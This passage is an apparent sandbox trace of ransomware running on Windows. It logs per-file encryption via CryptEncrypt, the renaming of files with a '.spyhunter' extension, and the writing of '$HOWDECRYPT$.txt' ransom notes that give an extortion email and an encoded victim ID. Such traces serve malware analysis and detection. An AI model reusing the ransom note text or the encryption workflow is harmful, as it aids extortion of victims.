liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.610] WriteFile (in: hFile=0xb0, lpBuffer=0x57effc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efbc, lpOverlapped=0x0 | out: lpBuffer=0x57effc*, lpNumberOfBytesWritten=0x57efbc*=0x4, lpOverlapped=0x0) returned 1 [0143.610] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efbc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efbc*=0x30, lpOverlapped=0x0) returned 1 [0143.610] CloseHandle (hObject=0xb0) returned 1 [0143.610] GetProcessHeap () returned 0x2c0000 [0143.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.610] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.spyhunter") returned 132 [0143.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.spyhunter")) returned 1 [0143.611] GetProcessHeap () returned 0x2c0000 [0143.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.611] GetProcessHeap () returned 0x2c0000 [0143.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.611] GetProcessHeap () returned 0x2c0000 [0143.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f04158 | out: hHeap=0x2c0000) returned 1 [0143.611] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eff8 | out: pbBuffer=0x57eff8) returned 1 [0143.611] GetProcessHeap () returned 0x2c0000 [0143.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.612] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eff0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eff0*=0x30) returned 1 [0143.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.612] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0143.612] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".txt") returned 0x0 [0143.612] GetProcessHeap () returned 0x2c0000 [0143.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.612] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57efb4*=0x5a9, lpOverlapped=0x0) returned 1 [0143.621] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.621] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5a9, lpNumberOfBytesWritten=0x57efb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57efb4*=0x5a9, lpOverlapped=0x0) returned 1 [0143.621] GetProcessHeap () returned 0x2c0000 [0143.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.621] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.621] WriteFile (in: hFile=0xb0, lpBuffer=0x57eff4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efb4, lpOverlapped=0x0 | out: lpBuffer=0x57eff4*, lpNumberOfBytesWritten=0x57efb4*=0x4, lpOverlapped=0x0) returned 1 [0143.621] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efb4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efb4*=0x30, lpOverlapped=0x0) returned 1 [0143.621] CloseHandle (hObject=0xb0) returned 1 [0143.622] GetProcessHeap () returned 0x2c0000 [0143.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.622] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.spyhunter") returned 129 [0143.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.spyhunter")) returned 1 [0143.622] GetProcessHeap () returned 0x2c0000 [0143.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.623] GetProcessHeap () returned 0x2c0000 [0143.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.623] GetProcessHeap () returned 0x2c0000 [0143.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9d60 | out: hHeap=0x2c0000) returned 1 [0143.623] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eff8 | out: pbBuffer=0x57eff8) returned 1 [0143.623] GetProcessHeap () returned 0x2c0000 [0143.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.623] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eff0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eff0*=0x30) returned 1 [0143.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.623] GetProcessHeap () returned 0x2c0000 [0143.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.623] GetProcessHeap () returned 0x2c0000 [0143.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3003a68 | out: hHeap=0x2c0000) returned 1 [0143.623] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eff0 | out: pbBuffer=0x57eff0) returned 1 [0143.623] GetProcessHeap () returned 0x2c0000 [0143.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.624] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efe8*=0x30) returned 1 [0143.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.624] GetProcessHeap () returned 0x2c0000 [0143.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.624] GetProcessHeap () returned 0x2c0000 [0143.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f00538 | out: hHeap=0x2c0000) returned 1 [0143.624] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eff0 | out: pbBuffer=0x57eff0) returned 1 [0143.624] GetProcessHeap () returned 0x2c0000 [0143.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.624] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efe8*=0x30) returned 1 [0143.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.625] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0143.625] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".txt") returned 0x0 [0143.625] GetProcessHeap () returned 0x2c0000 [0143.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.625] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57efac*=0x122, lpOverlapped=0x0) returned 1 [0143.626] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffede, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.626] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x57efac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57efac*=0x122, lpOverlapped=0x0) returned 1 [0143.626] GetProcessHeap () returned 0x2c0000 [0143.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.626] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.626] WriteFile (in: hFile=0xb0, lpBuffer=0x57efec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efac, lpOverlapped=0x0 | out: lpBuffer=0x57efec*, lpNumberOfBytesWritten=0x57efac*=0x4, lpOverlapped=0x0) returned 1 [0143.626] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efac*=0x30, lpOverlapped=0x0) returned 1 [0143.626] CloseHandle (hObject=0xb0) returned 1 [0143.626] GetProcessHeap () returned 0x2c0000 [0143.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.626] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.spyhunter") returned 105 [0143.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.spyhunter")) returned 1 [0143.627] GetProcessHeap () returned 0x2c0000 [0143.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.627] GetProcessHeap () returned 0x2c0000 [0143.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.627] GetProcessHeap () returned 0x2c0000 [0143.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f631f0 | out: hHeap=0x2c0000) returned 1 [0143.627] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efe8 | out: pbBuffer=0x57efe8) returned 1 [0143.628] GetProcessHeap () returned 0x2c0000 [0143.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.628] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efe0*=0x30) returned 1 [0143.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.628] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0143.628] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0143.628] GetProcessHeap () returned 0x2c0000 [0143.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.628] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efa4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57efa4*=0x92, lpOverlapped=0x0) returned 1 [0143.629] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.629] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x92, lpNumberOfBytesWritten=0x57efa4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57efa4*=0x92, lpOverlapped=0x0) returned 1 [0143.629] GetProcessHeap () returned 0x2c0000 [0143.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.629] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.630] WriteFile (in: hFile=0xb0, lpBuffer=0x57efe4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efa4, lpOverlapped=0x0 | out: lpBuffer=0x57efe4*, lpNumberOfBytesWritten=0x57efa4*=0x4, lpOverlapped=0x0) returned 1 [0143.630] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efa4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efa4*=0x30, lpOverlapped=0x0) returned 1 [0143.630] CloseHandle (hObject=0xb0) returned 1 [0143.630] GetProcessHeap () returned 0x2c0000 [0143.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.630] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.spyhunter") returned 99 [0143.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.spyhunter")) returned 1 [0143.631] GetProcessHeap () returned 0x2c0000 [0143.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.631] GetProcessHeap () returned 0x2c0000 [0143.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.631] GetProcessHeap () returned 0x2c0000 [0143.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f00438 | out: hHeap=0x2c0000) returned 1 [0143.631] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efe8 | out: pbBuffer=0x57efe8) returned 1 [0143.631] GetProcessHeap () returned 0x2c0000 [0143.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.631] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efe0*=0x30) returned 1 [0143.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.631] GetProcessHeap () returned 0x2c0000 [0143.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.631] GetProcessHeap () returned 0x2c0000 [0143.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65c58 | out: hHeap=0x2c0000) returned 1 [0143.631] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efe0 | out: pbBuffer=0x57efe0) returned 1 [0143.631] GetProcessHeap () returned 0x2c0000 [0143.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.632] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efd8*=0x30) returned 1 [0143.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.632] GetProcessHeap () returned 0x2c0000 [0143.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.632] GetProcessHeap () returned 0x2c0000 [0143.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f326a8 | out: hHeap=0x2c0000) returned 1 [0143.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.632] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.632] WriteFile (in: hFile=0xb0, lpBuffer=0x57ef13*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57f03c, lpOverlapped=0x0 | out: lpBuffer=0x57ef13*, lpNumberOfBytesWritten=0x57f03c*=0x127, lpOverlapped=0x0) returned 1 [0143.635] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.635] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57f03c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57f03c*=0x2ac, lpOverlapped=0x0) returned 1 [0143.636] CloseHandle (hObject=0xb0) returned 1 [0143.636] GetProcessHeap () returned 0x2c0000 [0143.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef400 | out: hHeap=0x2c0000) returned 1 [0143.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.636] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.636] WriteFile (in: hFile=0xb0, lpBuffer=0x57ef0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57f038, lpOverlapped=0x0 | out: lpBuffer=0x57ef0f*, lpNumberOfBytesWritten=0x57f038*=0x127, lpOverlapped=0x0) returned 1 [0143.637] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.637] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57f038, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57f038*=0x2ac, lpOverlapped=0x0) returned 1 [0143.637] CloseHandle (hObject=0xb0) returned 1 [0143.637] GetProcessHeap () returned 0x2c0000 [0143.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff8008 | out: hHeap=0x2c0000) returned 1 [0143.637] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efd8 | out: pbBuffer=0x57efd8) returned 1 [0143.637] GetProcessHeap () returned 0x2c0000 [0143.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.638] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efd0*=0x30) returned 1 [0143.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.638] GetProcessHeap () returned 0x2c0000 [0143.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.638] GetProcessHeap () returned 0x2c0000 [0143.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030e98 | out: 